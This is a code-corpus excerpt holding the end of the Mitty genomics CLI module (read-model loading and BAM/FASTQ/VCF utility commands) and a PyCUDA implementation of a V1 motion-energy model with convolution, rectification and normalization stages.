  :param sub_type: Some modification of the model. Currently restricted to '-flat-coverage' for 'illumina'
  :return: (read_module, model) tuple. read_module is None when
           model['model_class'] + sub_type has no registered module.
  """
  import pickle
  import pkg_resources

  # These are hard coded for now, might use entry points like before to pip install models
  import mitty.simulation.illumina
  import mitty.simulation.sequencing.flat_illumina

  if pkg_resources.resource_exists(__name__, 'data/readmodels/' + modelfile):
    logging.debug('Found model {} in builtins'.format(modelfile))
    mod_fname = pkg_resources.resource_filename(__name__, 'data/readmodels/' + modelfile)
  else:
    logging.debug('Treating {} as literal path to model file'.format(modelfile))
    mod_fname = modelfile  # treat this as a literal file path

  # Fix: close the pickle file deterministically (original leaked the handle)
  with open(mod_fname, 'rb') as fp:
    model = pickle.load(fp)

  read_module = {
    'illumina': mitty.simulation.illumina,
    'illumina-flat-coverage': mitty.simulation.sequencing.flat_illumina,
  }.get(model['model_class'] + sub_type)
  return read_module, model
# Top-level `utils` command group; subcommands below attach via @utils.command.
# (No docstring on purpose -- click would surface it as long help text.)
@cli.group('utils', short_help='Miscellaneous utilities')
def utils():
  pass
# Fixes two user-facing typos: short_help said "BAM of FASTQ" (should be "or")
# and the docstring (click long help) said "trancate".
@utils.command('retruncate-qname', short_help='Given a BAM or FASTQ')
@click.argument('mainfile-in', type=click.Path(exists=True))
@click.argument('sidecar-in', type=click.Path(exists=True))
@click.argument('mainfile-out', type=click.Path())
@click.argument('sidecar-out', type=click.Path())
@click.option('--truncate-to', type=int, default=240)
@click.option('--file-type', type=click.Choice(['BAM', 'FASTQ']), help='If supplied overrides autodetection')
def retruncate_qname(mainfile_in, sidecar_in, mainfile_out, sidecar_out, truncate_to, file_type):
  """Given a FASTQ (or BAM) and a long-qnames file truncate the qnames to
  whatever length we want and push the too-long qnames to the overflow
  file. Also convert any old style qnames (not ending in a *) to new style
  ones with a proper termination character"""
  import mitty.empirical.qnametruncate as qt
  qt.main(mainfile_in, sidecar_in, mainfile_out, sidecar_out, truncate_to=truncate_to, file_type=file_type)
@utils.command('vcf-complexity', short_help='Annotate variants with complexity measures')
@click.argument('vcfin', type=click.Path(exists=True))
@click.argument('vcfout', type=click.Path())
@click.argument('ref', type=click.Path(exists=True))
@click.argument('bg', type=click.Path(exists=True))
@click.option('--window-size', type=int, default=100, help='Window size of SE and LC computation')
def vcf_complexity(vcfin, vcfout, ref, bg, window_size):
  """Annotate variants with complexity measures"""
  # Thin wrapper: all work happens in mitty.benchmarking.complexity.
  # `ref` is the reference FASTA; `bg` is presumably a background file for
  # the complexity model -- confirm against cplx.vcf_complexity.
  import mitty.benchmarking.complexity as cplx
  cplx.vcf_complexity(
    vcf_in_fname=vcfin, vcf_out_fname=vcfout,
    ref_fname=ref, bg_fname=bg, window_size=window_size)
@utils.command('gc-cov')
@click.argument('bam', type=click.Path(exists=True))
@click.argument('fasta', type=click.Path(exists=True))
@click.argument('pkl')
@click.option('-b', '--block-len', type=int, default=10000, help='Block size for GC/cov computation')
@click.option('-t', '--threads', type=int, default=1, help='Threads to use')
def gc_cov(bam, fasta, pkl, block_len, threads):
  """Calculate GC content vs coverage from a BAM. Save in pickle file"""
  # Delegates to mitty.empirical.gc; `pkl` is the output pickle path.
  import mitty.empirical.gc as megc
  megc.process_bam_parallel(bam, fasta, pkl, block_len=block_len, threads=threads)
@utils.command('bq')
@click.argument('bam', type=click.Path(exists=True))
@click.argument('pkl')
@click.option('-t', '--threads', type=int, default=1, help='Threads to use')
def sample_bq(bam, pkl, threads):
  """BQ distribution from BAM"""
  # Computes the base-quality distribution over the BAM in parallel and
  # pickles the result to `pkl`.
  import mitty.empirical.bq as bbq
  bbq.process_bam_parallel(bam, pkl, threads=threads)
@utils.command('filter-eval-vcf', short_help='Split out the FP and FN from an eval.vcf')
@click.argument('vcfin', type=click.Path(exists=True))
@click.argument('outprefix')
def filter_eval_vcf(vcfin, outprefix):
  """Split an eval VCF into its false-positive and false-negative call
  sets, written out under the given output prefix"""
  # NOTE: the previous docstring ("Subset VCF for given sample, apply BED
  # file...") was copy-pasted from an unrelated command; corrected here to
  # match the short_help and fev.extract_fp_fn.
  import mitty.benchmarking.filterevalvcf as fev
  fev.extract_fp_fn(vcfin, outprefix)
@utils.command('qname-stats', short_help='Given a FASTQ + side-car show us qname distribution')
@click.argument('fastq', type=click.Path(exists=True))
@click.argument('sidecar', type=click.Path(exists=True))
@click.option('--max-expected-qname', type=int, default=500, help='qname bin upper bound')
def qname_stats(fastq, sidecar, max_expected_qname):
  """A simple routine to load in a FASTQ file and give us the distribution of
  qname lengths, because I was curious"""
  import mitty.empirical.qnamestats as qs

  # One histogram bin per qname length, 0 .. max_expected_qname
  length_histogram = qs.main(fastq_fname=fastq, qname_overflow_fname=sidecar,
                             max_expected_qname_length=max_expected_qname)
  # Dump as simple "length, count" CSV lines to stdout
  for qname_len, count in enumerate(length_histogram):
    print('{}, {}'.format(qname_len, count))
|
sbg/Mitty
|
mitty/cli.py
|
Python
|
apache-2.0
| 30,231
|
[
"BWA"
] |
3e614a23038a465232582599f89f3d712f3e20d38b52356640f52c5e079d297d
|
# import and init CUDA
import pycuda.autoinit
import pycuda.driver as cuda
import numpy as np
import Image
from pylab import show, imshow
import logging
logging.basicConfig(format='%(levelname)s: %(message)s',
level=logging.WARNING)
# motion energy device code
# SourceModule stored in variable mod
# from motion_energy_device import *
from device import *
# CUDA helper functions for alignment
# from cuda_helper import *
def iDivUp(a, b):
    """Return ceil(a / b) for positive integers, as an np.int32.

    Used to size CUDA grids. Fix: the original used `/`, which under
    Python 3 performs true division on np.int32 and yields a float
    (invalid as a grid dimension). Floor division `//` is identical to
    the original behaviour under Python 2 and correct under Python 3.
    """
    a = np.int32(a)
    b = np.int32(b)
    return (a // b + 1) if (a % b != 0) else (a // b)
class MotionEnergy:
"""Documentation for a class
More details.
"""
sizeofFloat = 4
##########################################################################
# CONSTRUCTOR / DESTRUCTOR
##########################################################################
    def __init__(self, nrX, nrY, nrC):
        """Set up the motion-energy model for frames of nrX x nrY pixels.

        :param nrX: frame width in pixels (must be >= minNrX, currently 19)
        :param nrY: frame height in pixels (must be >= minNrY, currently 19)
        :param nrC: number of color channels; only 1 (grayscale) supported

        Loads the S&H parameters, establishes the CUDA context and
        allocates all device buffers (see _initME).
        """
        # load params and scaling factors
        self._initParams()
        self.nrX = nrX
        self.nrY = nrY
        self.nrC = nrC
        # minNrX/minNrY come from _initParams(), so it must run first
        assert nrX >= self.minNrX, "nrX must be >= %r" % self.minNrX
        assert nrY >= self.minNrY, "nrY must be >= %r" % self.minNrY
        # \TODO implement RGB support
        assert nrC == 1, "number of channels (%r) must be 1 (grayscale)" % nrC
        # initialize CUDA and establish context
        self._initCUDA()
        # initialize Motion Energy
        self._initME()
    def __enter__(self):
        # Context-manager entry: all allocation already happened in
        # __init__, so just hand back the instance.
        return self
def __exit__(self, type, value, traceback):
"""The destructor."""
# clean up
self.d_resp.free()
self.d_respV1c.free()
self.d_stim.free()
self.d_stimBuf.free()
self.d_diffV1GausBufT.free()
self.d_scalingStimBuf.free()
self.d_v1GausBuf.free()
self.d_diffV1GausBuf.free()
self.d_pop.free()
for file in self.files:
os.unlink(file)
##########################################################################
# PUBLIC METHODS
##########################################################################
    def calcV1complex(self, stim, speed):
        """Compute V1 complex cell responses of a frame.

        :param stim: grayscale frame as a numpy.ndarray (see _loadInput)
        :param speed: motion speed the direction filters are steered to
        :return: float32 numpy array of length nrX*nrY*nrDirs with the
                 V1 complex responses, copied back from the device

        The pipeline stages below are order-dependent: each one reads the
        device buffers the previous one wrote.
        """
        # allocate stim on device
        self._loadInput(stim)
        # convolve the stimulus with separate V1 filters
        self._calcV1linear()
        # rectify linear response to get V1 simple cell firing rate
        self._calcV1rect()
        # spatial pooling to get V1 complex
        self._calcV1blur()
        # divisive normalization
        self._calcV1normalize()
        # steer filters in specified directions
        self._calcV1direction(speed)
        # get data from device
        res = np.zeros(self.nrX*self.nrY*self.nrDirs).astype(np.float32)
        cuda.memcpy_dtoh(res, self.d_respV1c)
        return res
##########################################################################
# "PRIVATE" METHODS
##########################################################################
    def _accumDiffStims(self, d_resp_tmp, diffV1GausBuf, sizes, orderX,
                        orderY, orderT):
        """ Gets the responses of the filters specified in d_v1popDirs by
        interpolation.
        This is basically what shSwts.m did in the original S&H code.

        :param d_resp_tmp: device pointer where responses are accumulated
        :param diffV1GausBuf: device pointer to the directional derivative
        :param sizes: (nrX, nrY, depth) tuple; only sizes[0]*sizes[1] used
        :param orderX/orderY/orderT: derivative orders, summing to 3
        """
        # a useful list of factorials for computing the scaling factors for
        # the derivatives
        factorials = (1, 1, 2, 6)
        # the scaling factor for this directional derivative
        # similar to the binomial coefficients
        # (integer under Py2 since 3! divides 6 for all valid orders;
        # NOTE(review): under Py3 `/` would make this a float before the
        # np.int32 cast -- confirm the kernel expects an int scale)
        scale = 6/factorials[orderX]/factorials[orderY]/factorials[orderT]
        gdim = (int(iDivUp(sizes[0] * sizes[1], 256)), 1)
        bdim = (256, 1, 1)
        self.dev_accumDiffStims(
            np.intp(d_resp_tmp),
            np.intp(diffV1GausBuf),
            np.int32(sizes[0] * sizes[1]),
            np.int32(scale),
            np.int32(orderX),
            np.int32(orderY),
            np.int32(orderT),
            block=bdim, grid=gdim)
    def _calcV1linear(self):
        """Linear V1 stage: filter the buffered stimulus with all 28
        space-time derivative filters at every spatial scale, writing the
        responses into d_resp (one nrX*nrY*nrFilters slab per scale).
        """
        # compute the V1 simple cell response at different spatial scales
        # the i-th scale blurs and downsamples the image (i-1) times
        logging.debug('calcV1linear')
        # NOTE(review): `sbuf` is filled from the device but never read
        # afterwards -- looks like dead code, but memcpy_dtoh also
        # synchronizes the device, so it is left in place; confirm.
        sbuf = np.zeros(self.nrX * self.nrY * self.nrT).astype(np.float32)
        cuda.memcpy_dtoh(sbuf, self.d_scalingStimBuf)
        for scale in xrange(1, self.nrScales + 1):
            # blur/scale the image... each time this is called stim is
            # blurred more
            # scale==1 --> original image resolution
            # list includes self.nrScales
            if scale > 1:
                # convolve d_scalingStimBuf by scalingFilt in 3D
                d_tmp = cuda.mem_alloc(self.szXY * self.nrT)
                sizes = (self.nrX, self.nrY, self.nrT)
                self._conv3D(
                    self.d_scalingStimBuf,
                    d_tmp,
                    sizes,
                    self.d_scalingFilt,
                    np.int32(self.scalingFiltSize))
                cuda.memcpy_dtod(self.d_scalingStimBuf, d_tmp,
                                 self.szXY * self.nrT)
                d_tmp.free()  # this is a little silly, because the result
                # ends up in d_resp
            # nrT is 9, v1GaussFiltSize is 9, so we're taking
            # d_scalingStimBuf[0 ... 0+nrX*nrY*9]
            # since nrT could be greater than v1GaussFiltSize, we take "only
            # the part we want", quote Micah comment
            gdim = (int(iDivUp(self.nrX * self.nrY * self.v1GaussFiltSize,
                               256)), 1)
            bdim = (256, 1, 1)
            stimBufPt_dst = np.intp(self.d_v1GausBuf)
            # center the v1GaussFiltSize-frame window inside the nrT frames
            # (Py2 integer division; under Py3 `/` would yield a float)
            offset = self.szXY * ((self.nrT - self.v1GaussFiltSize)/2)
            stimBufPt_src = np.intp(self.d_scalingStimBuf) + offset
            self.dev_memcpy_dtod(np.intp(stimBufPt_dst),
                                 np.intp(stimBufPt_src),
                                 np.int32(self.nrX * self.nrY *
                                          self.v1GaussFiltSize),
                                 block=bdim,
                                 grid=gdim)
            # convolve d_v1GausBuf by v1Gaus in 3D
            d_tmp = cuda.mem_alloc(self.szXY * self.v1GaussFiltSize)
            sizes = (self.nrX, self.nrY, self.v1GaussFiltSize)
            self._conv3D(
                self.d_v1GausBuf,
                d_tmp,
                sizes,
                self.d_v1GaussFilt,
                np.int32(self.v1GaussFiltSize))
            cuda.memcpy_dtod(self.d_v1GausBuf, d_tmp,
                             self.szXY * self.v1GaussFiltSize)
            # go through and calculate all directional derivatives and then
            # combine them to calculate the different space-time oriented
            # filters
            for orderT in xrange(0, 3 + 1):
                # reset diffV1GausBufT back to the 3D gaussian filtered
                # version
                cuda.memcpy_dtod(self.d_diffV1GausBufT, self.d_v1GausBuf,
                                 self.szXY * self.v1GaussFiltSize)
                if orderT > 0:
                    # take the derivative
                    # sizes = (self.nrX, self.nrY, self.v1GaussFiltSize)
                    self._diff(self.d_diffV1GausBufT, sizes, orderT, 2)
                for orderY in xrange(0, 3 - orderT + 1):
                    # derivative orders always sum to 3 (third derivatives)
                    orderX = 3 - orderY - orderT
                    cuda.memcpy_dtod(self.d_diffV1GausBuf,
                                     self.d_diffV1GausBufT,
                                     self.szXY * self.v1GaussFiltSize)
                    if orderX > 0:
                        self._diff(self.d_diffV1GausBuf, sizes, orderX, 0)
                    if orderY > 0:
                        self._diff(self.d_diffV1GausBuf, sizes, orderY, 1)
                    # combine the directional derivative by the direction of
                    # the space-time filter
                    # this is basically doing what shSwts.m did in the
                    # original S&H code
                    off1 = (scale - 1) * self.szXY * self.nrFilters
                    off2 = self.szXY * self.v1GaussFiltSize/2
                    d_respPtr = np.intp(self.d_resp) + off1
                    d_diffV1GausBufPtr = np.intp(self.d_diffV1GausBuf) + off2
                    self._accumDiffStims(d_respPtr, d_diffV1GausBufPtr, sizes,
                                         orderX, orderY, orderT)
        # \NOTE the scaling factor scaleV1linear will be applied in
        # calcV1rect()
        # consider edge effects
        # suppress filter responses at pixel locations close to image border
        length = self.nrX * self.nrY * self.nrFilters * self.nrScales
        gdim = (int(iDivUp(length, 256)), 1)
        bdim = (256, 1, 1)
        self.dev_edges(
            self.d_resp,
            np.int32(length),
            np.int32(self.nrX),
            np.int32(self.nrY),
            block=bdim, grid=gdim)
def _calcV1rect(self):
"""Performs full-wave rectification of the linear responses."""
logging.debug('calcV1rect')
length = self.nrX*self.nrY*self.nrFilters*self.nrScales
gdim = (int(iDivUp(length, 256)), 1)
bdim = (256, 1, 1)
self.dev_fullRect2(
self.d_resp,
np.int32(length),
np.double(self.scaleV1Linear),
np.double(self.scaleV1FullWaveRect),
block=bdim, grid=gdim)
def _calcV1blur(self):
logging.debug('calcV1blur')
d_tmp = cuda.mem_alloc(self.szXY*self.nrFilters*self.nrScales)
sizes = (self.nrX, self.nrY, self.nrFilters*self.nrScales)
self._conv2D(self.d_resp, d_tmp, sizes, self.d_complexV1Filt,
self.complexV1FiltSize)
d_tmp.free() # result ends up in d_resp
length = self.nrX * self.nrY * self.nrFilters * self.nrScales
gdim = (int(iDivUp(length, 256)), 1)
bdim = (256, 1, 1)
self.dev_scale(
self.d_resp,
np.double(self.scaleV1Blur),
np.int32(length),
block=bdim, grid=gdim)
    def _calcV1normalize(self):
        """Divisive normalization of the pooled V1 responses.

        Builds a per-pixel population signal in d_pop (mean over the 28
        filters, spatially summed), then divides d_resp by it.
        """
        logging.debug('calcV1normalize')
        # we need to associate each filter at pixel position (x,y) with a
        # power/intensity, but there are 28 filter responses at each location
        # so we need to (i) average over the 28 filters (3rd dimension in
        # d_resp) and put it in d_pop
        gdim = (int(iDivUp(self.nrX*self.nrY, 128)), self.nrScales)
        bdim = (128, 1, 1)
        self.dev_mean3(
            self.d_resp,
            self.d_pop,
            np.int32(self.nrX*self.nrY),
            np.int32(self.nrFilters),
            block=bdim, grid=gdim)
        # ... (ii) scale with scaleV1Complex ...
        length = self.nrX*self.nrY*self.nrFilters*self.nrScales
        gdim = (int(iDivUp(length, 128)), 1)
        bdim = (128, 1, 1)
        self.dev_scale(
            self.d_resp,
            np.double(self.scaleV1Complex),
            np.int32(length),
            block=bdim, grid=gdim)
        # ... and (iii) sum over some spatial neighborhood for the
        # normalization
        sizes = (self.nrX, self.nrY, self.nrScales)
        d_tmp = cuda.mem_alloc(self.szXY*self.nrScales)
        self._conv2D(
            self.d_pop,
            d_tmp,
            sizes,
            self.d_normV1filt,
            self.normV1filtSize)
        d_tmp.free()  # result ends up in d_pop
        # scale with V1NormStrength and V1NormPopK
        gdim = (int(iDivUp(self.nrX * self.nrY * self.nrScales, 128)), 1)
        bdim = (128, 1, 1)
        self.dev_scale(
            self.d_pop,
            np.double(self.scaleV1NormStrength*self.scaleV1NormPopK),
            np.int32(self.nrX*self.nrY*self.nrScales),
            block=bdim, grid=gdim)
        # divisive normalization
        # d_resp is the numerator, d_pop the denominator sum term
        gdim = (int(iDivUp(self.nrX * self.nrY, 128)), self.nrScales)
        bdim = (128, 1, 1)
        self.dev_normalize(
            self.d_resp,
            self.d_pop,
            np.int32(self.nrX*self.nrY),
            np.double(self.scaleV1C50),
            block=bdim, grid=gdim)
    def _calcV1direction(self, speed):
        """Generate direction selectivity via filter interpolation.

        The 28 filter responses do now need to be collapsed onto the
        directions and speeds of motion specified in the motion
        projections.

        :param speed: motion speed the nrDirs direction channels are
                      steered to (passed straight to dev_filt2dir)
        """
        logging.debug('calcV1direction')
        length = self.nrX*self.nrY*self.nrFilters*self.nrScales*self.nrDirs
        gdim = (int(iDivUp(length, 256)), 1)
        bdim = (256, 1, 1)
        self.dev_filt2dir(
            self.d_respV1c,
            self.d_resp,
            np.int32(length),
            np.int32(self.nrX * self.nrY),
            np.int32(self.nrScales),
            np.double(speed),
            block=bdim, grid=gdim)
        # half-wave rectification to avoid negative firing rates
        # 0 Hz spontaneous firing
        # \TODO justify scaling factors
        # print "dont't halfrect again"
        gdim = (int(iDivUp(self.nrX * self.nrY * self.nrDirs, 128)), 1)
        bdim = (128, 1, 1)
        self.dev_scaleHalfRect(
            self.d_respV1c,
            np.int32(self.nrX * self.nrY * self.nrDirs),
            np.double(self.scaleV1ComplexFiring),
            np.double(0),
            block=bdim, grid=gdim)
def _conv2D(self, d_idata, d_odata, sizes, d_filt, filtlen):
logging.debug("conv2D")
# convolve the first dimension
gdim = (int(iDivUp(sizes[0], self.CONV1_THREAD_SIZE-(filtlen-1))),
sizes[1]*sizes[2])
bdim = (self.CONV1_THREAD_SIZE, 1, 1)
self.dev_conv1(
d_idata,
d_odata,
np.int32(sizes[0]),
np.intp(d_filt),
np.int32(filtlen),
block=bdim, grid=gdim)
szBytes = self.sizeofFloat*reduce(lambda x, y: x*y, sizes)
d_tmp = cuda.mem_alloc(szBytes)
cuda.memcpy_dtod(d_tmp, d_idata, szBytes)
cuda.memcpy_dtod(d_idata, d_odata, szBytes)
cuda.memcpy_dtod(d_odata, d_tmp, szBytes)
# convolve the second dimension
gdim = (int(iDivUp(sizes[0], self.CONVN_THREAD_SIZE1)),
int(iDivUp(sizes[1],
self.CONVN_THREAD_SIZE2-(filtlen - 1)) * sizes[2]))
bdim = (self.CONVN_THREAD_SIZE1, self.CONVN_THREAD_SIZE2, 1)
self.dev_convn(
d_idata,
d_odata,
np.int32(sizes[0]),
np.int32(sizes[1]),
np.int32(sizes[0]),
np.int32(sizes[0]*sizes[1]),
np.int32(sizes[2]),
np.intp(d_filt),
np.int32(filtlen),
block=bdim, grid=gdim)
def _conv3D(self, d_idata, d_odata, sizes, d_filt, filtlen):
logging.debug('conv3D')
# convolve the first dimension
gdim = (int(iDivUp(sizes[0], self.CONV1_THREAD_SIZE-(filtlen - 1))),
sizes[1]*sizes[2])
bdim = (self.CONV1_THREAD_SIZE, 1, 1)
self.dev_conv1(
d_idata,
d_odata,
np.int32(sizes[0]),
np.intp(d_filt),
np.int32(filtlen),
block=bdim, grid=gdim)
szBytes = self.sizeofFloat*reduce(lambda x, y: x*y, sizes)
d_tmp = cuda.mem_alloc(szBytes)
cuda.memcpy_dtod(d_tmp, d_idata, szBytes)
cuda.memcpy_dtod(d_idata, d_odata, szBytes)
cuda.memcpy_dtod(d_odata, d_tmp, szBytes)
# convolve the second dimension
gdim = (int(iDivUp(sizes[0], self.CONVN_THREAD_SIZE1)),
int(iDivUp(sizes[1],
self.CONVN_THREAD_SIZE2 - (filtlen - 1))*sizes[2]))
bdim = (self.CONVN_THREAD_SIZE1, self.CONVN_THREAD_SIZE2, 1)
self.dev_convn(
d_idata,
d_odata,
np.int32(sizes[0]),
np.int32(sizes[1]),
np.int32(sizes[0]),
np.int32(sizes[0]*sizes[1]),
np.int32(sizes[2]),
np.intp(d_filt),
np.int32(filtlen),
block=bdim, grid=gdim)
cuda.memcpy_dtod(d_tmp, d_idata, szBytes)
cuda.memcpy_dtod(d_idata, d_odata, szBytes)
cuda.memcpy_dtod(d_odata, d_tmp, szBytes)
# convolve the third dimension
gdim = (int(iDivUp(sizes[0], self.CONVN_THREAD_SIZE1)),
int(iDivUp(sizes[2],
self.CONVN_THREAD_SIZE2 - (filtlen - 1))*sizes[1]))
bdim = (self.CONVN_THREAD_SIZE1, self.CONVN_THREAD_SIZE2, 1)
self.dev_convn(
d_idata,
d_odata,
np.int32(sizes[0]),
np.int32(sizes[2]),
np.int32(sizes[0]*sizes[1]),
np.int32(sizes[0]),
np.int32(sizes[1]),
np.intp(d_filt),
np.int32(filtlen),
block=bdim, grid=gdim)
cuda.memcpy_dtod(d_tmp, d_idata, szBytes)
cuda.memcpy_dtod(d_idata, d_odata, szBytes)
cuda.memcpy_dtod(d_odata, d_tmp, szBytes)
    def _diff(self, d_iodata, sizes, order, dim):
        """Takes the derivative of iodata, returns as iodata.

        :param d_iodata: device buffer, differentiated in place
        :param sizes: (sizes[0], sizes[1], sizes[2]) logical 3D extents
        :param order: derivative order, 1..3 (selects the diffN filter)
        :param dim: axis to differentiate, 0/1/2
        NOTE(review): a dim outside 0..2 silently copies the uninitialized
        scratch buffer back into d_iodata -- callers only pass 0..2.
        """
        if order == 1:
            filtlen = self.diff1filtSize
            filt = self.d_diff1filt
        elif order == 2:
            filtlen = self.diff2filtSize
            filt = self.d_diff2filt
        elif order == 3:
            filtlen = self.diff3filtSize
            filt = self.d_diff3filt
        else:
            raise NameError("Order must be in the range [1,3]")
        szBytes = self.sizeofFloat*reduce(lambda x, y: x*y, sizes)
        d_tmp_odata = cuda.mem_alloc(szBytes)
        if dim == 0:
            # convolve the first dimension
            gdim = (int(iDivUp(sizes[0],
                               self.CONV1_THREAD_SIZE - (filtlen-1))),
                    sizes[1] * sizes[2])
            bdim = (self.CONV1_THREAD_SIZE, 1, 1)
            self.dev_conv1(
                d_iodata,
                d_tmp_odata,
                np.int32(sizes[0]),
                np.intp(filt),
                np.int32(filtlen),
                block=bdim, grid=gdim)
        elif dim == 1:
            # convolve the second dimension
            gdim = (int(iDivUp(sizes[0], self.CONVN_THREAD_SIZE1)),
                    int(iDivUp(sizes[1],
                               self.CONVN_THREAD_SIZE2 - (filtlen - 1)) * sizes[2]))
            bdim = (self.CONVN_THREAD_SIZE1, self.CONVN_THREAD_SIZE2, 1)
            self.dev_convn(
                d_iodata,
                d_tmp_odata,
                np.int32(sizes[0]),
                np.int32(sizes[1]),
                np.int32(sizes[0]),
                np.int32(sizes[0]*sizes[1]),
                np.int32(sizes[2]),
                np.intp(filt),
                np.int32(filtlen),
                block=bdim, grid=gdim)
        elif dim == 2:
            # convolve the third dimension
            gdim = (int(iDivUp(sizes[0], self.CONVN_THREAD_SIZE1)),
                    int(iDivUp(sizes[2],
                               self.CONVN_THREAD_SIZE2 - (filtlen - 1)) * sizes[1]))
            bdim = (self.CONVN_THREAD_SIZE1, self.CONVN_THREAD_SIZE2, 1)
            self.dev_convn(
                d_iodata,
                d_tmp_odata,
                np.int32(sizes[0]),
                np.int32(sizes[2]),
                np.int32(sizes[0]*sizes[1]),
                np.int32(sizes[0]),
                np.int32(sizes[1]),
                np.intp(filt),
                np.int32(filtlen),
                block=bdim, grid=gdim)
        # copy the result back into the in/out buffer and free the scratch
        cuda.memcpy_dtod(d_iodata, d_tmp_odata, szBytes)
        d_tmp_odata.free()
    def _initCUDA(self):
        """Initializes CUDA and establishes context using pycuda.autoinit"""
        # pycuda.autoinit already created the context at import time; we
        # only record the device handle and its compute capability here.
        self.context = None
        self.device = pycuda.autoinit.device
        self.computecc = self.device.compute_capability()
def _initME(self):
"""Initializes the MotionEnergy CUDA functions."""
logging.debug('initME')
# register all device functions for easy access
# imported from motion_energy_device.py
self.dev_conv1 = mod.get_function("dev_conv1")
self.dev_convn = mod.get_function("dev_convn")
self.dev_accumDiffStims = mod.get_function("dev_accumDiffStims")
self.dev_filt2dir = mod.get_function("dev_filt2dir")
self.dev_edges = mod.get_function("dev_edges")
self.dev_fullRect2 = mod.get_function("dev_fullRect2")
self.dev_mean3 = mod.get_function("dev_mean3")
self.dev_normalize = mod.get_function("dev_normalize")
self.dev_split_gray = mod.get_function("dev_split_gray")
self.dev_split_RGB = mod.get_function("dev_split_RGB")
self.dev_sub = mod.get_function("dev_sub")
self.dev_ave = mod.get_function("dev_ave")
self.dev_sum = mod.get_function("dev_sum")
self.dev_scaleHalfRect = mod.get_function("dev_scaleHalfRect")
self.dev_scale = mod.get_function("dev_scale")
self.dev_split_gray = mod.get_function("dev_split_gray")
self.dev_split_RGB = mod.get_function("dev_split_RGB")
self.dev_memcpy_dtod = mod.get_function("dev_memcpy_dtod")
# for quick access: the size in bytes of nrX*nrY floats
self.szXY = self.sizeofFloat * self.nrX * self.nrY
# V1 filter responses
self.d_resp = cuda.mem_alloc(self.szXY*self.nrFilters*self.nrScales)
# V1 complex cell responses
self.d_respV1c = cuda.mem_alloc(self.szXY*self.nrDirs)
# stim frame
self.d_stim = cuda.mem_alloc(self.szXY*self.nrC)
# stim frame buffer (last nrT frames)
self.d_stimBuf = cuda.mem_alloc(self.szXY*self.nrT)
# I'm not sure if this memset works as expected... for now, memcpy an
# array of zeros
# cuda.memset_d32(self.d_stimBuf, 0, self.nrX*self.nrY*self.nrT)
tmp = np.zeros(self.nrX*self.nrY*self.nrT).astype(np.float32)
cuda.memcpy_htod(self.d_stimBuf, tmp)
self.d_diffV1GausBufT = cuda.mem_alloc(self.szXY*self.v1GaussFiltSize)
self.d_scalingStimBuf = cuda.mem_alloc(self.szXY*self.nrT)
self.d_v1GausBuf = cuda.mem_alloc(self.szXY*self.v1GaussFiltSize)
self.d_diffV1GausBuf = cuda.mem_alloc(self.szXY*self.v1GaussFiltSize)
self.d_pop = cuda.mem_alloc(self.szXY*self.nrScales)
self.d_scalingFilt = mod.get_global("d_scalingFilt")[0]
self.d_v1GaussFilt = mod.get_global("d_v1GaussFilt")[0]
self.d_complexV1Filt = mod.get_global("d_complexV1Filt")[0]
self.d_normV1filt = mod.get_global("d_normV1filt")[0]
self.d_diff1filt = mod.get_global("d_diff1filt")[0]
self.d_diff2filt = mod.get_global("d_diff2filt")[0]
self.d_diff3filt = mod.get_global("d_diff3filt")[0]
def _initParams(self):
"""Initializes all class attributes to default values, akin to
shPars.m
"""
logging.debug('initParams')
self.nrDirs = 8
self.nrFilters = 28
self.nrScales = 3 # number of scales at which to filter
self.nrT = 9
self.v1GaussFiltSize = 9
# from shGetDims
# dimensions must be greater or equal these
# \TODO compute instead of hardcoding
self.minNrX = 19
self.minNrY = 19
self.scalingFiltSize = 5
self.CONV1_THREAD_SIZE = 256
self.CONVN_THREAD_SIZE1 = 16
self.CONVN_THREAD_SIZE2 = 31 # 31 is faster than 32
# S&H scaling factors
self.scaleV1Linear = 6.6084
self.scaleV1FullWaveRect = 1.9263
self.scaleV1Blur = 1.0205
self.scaleV1NormPopK = 1.0 # 0.2401
self.scaleV1NormStrength = 0.98
self.scaleV1Complex = 0.99
self.scaleV1C50 = 0.1
self.scaleV1ComplexFiring = 10.0
# some more #define
self.diff1filtSize = 3
self.diff2filtSize = 3
self.diff3filtSize = 5
self.complexV1FiltSize = 11
self.normV1filtSize = 25
    def _loadInput(self, stim):
        """Push a new grayscale frame into the rolling device stimulus
        buffer and reset the response buffers.

        :param stim: 2D numpy.ndarray (rows x cols); cast to uint8 before
                     upload. NOTE(review): its size is assumed to match
                     nrX*nrY -- not checked here; confirm callers.
        """
        logging.debug('loadInput')
        # shortcuts
        nrXY = self.nrX * self.nrY
        nrXYD = self.nrX * self.nrY * self.nrDirs
        # parse input
        assert type(stim).__module__ == "numpy", "stim must be numpy array"
        assert type(stim).__name__ == "ndarray", "stim must be numpy.ndarray"
        assert stim.size > 0, "stim cannot be []"
        stim = stim.astype(np.ubyte)
        rows, cols = stim.shape
        logging.debug("- stim shape={0}x{1}".format(rows, cols))
        # shift d_stimBuf in time by 1 frame, from frame i to frame i-1
        # write our own memcpy kernel... :-(
        gdim = (int(iDivUp(nrXY, 128)), 1)
        bdim = (128, 1, 1)
        for i in xrange(1, self.nrT):
            stimBufPt_dst = np.intp(self.d_stimBuf) + self.szXY * (i - 1)
            stimBufPt_src = np.intp(self.d_stimBuf) + self.szXY * i
            self.dev_memcpy_dtod(
                stimBufPt_dst,
                stimBufPt_src,
                np.int32(nrXY),
                block=bdim, grid=gdim)
        # index into d_stimBuf array to place the new stim at the end
        # (newest frame at pos: nrT-1)
        d_stimBufPt = np.intp(self.d_stimBuf) + self.szXY * (self.nrT-1)
        # \TODO implement RGB support
        self.dev_split_gray(
            d_stimBufPt,
            cuda.In(stim),
            np.int32(stim.size),
            block=bdim, grid=gdim)
        # create working copy of d_stimBuf
        cuda.memcpy_dtod(self.d_scalingStimBuf, self.d_stimBuf,
                         self.szXY*self.nrT)
        # reset V1complex responses to 0
        # \FIXME not sure how to use memset...doesn't seem to give expected
        # result
        tmp = np.zeros(nrXYD).astype(np.float32)
        cuda.memcpy_htod(self.d_respV1c, tmp)
        # allocate d_resp, which will contain the response to all 28
        # (nrFilters) space-time orientations at 3 (nrScales) scales for
        # every pixel location (nrX*nrY)
        tmp = np.zeros(nrXY*self.nrFilters*self.nrScales).astype(np.float32)
        cuda.memcpy_htod(self.d_resp, tmp)
|
UCI-CARL/MotionEnergy
|
pyME/pyME/motionenergy.py
|
Python
|
mit
| 26,322
|
[
"Gaussian"
] |
3f6ae503a589febefe379e00d8b9c1deaa6cb2f6423cbb14345423a0b6b06893
|
import itertools
import time
from collections import defaultdict
from datetime import datetime, timedelta
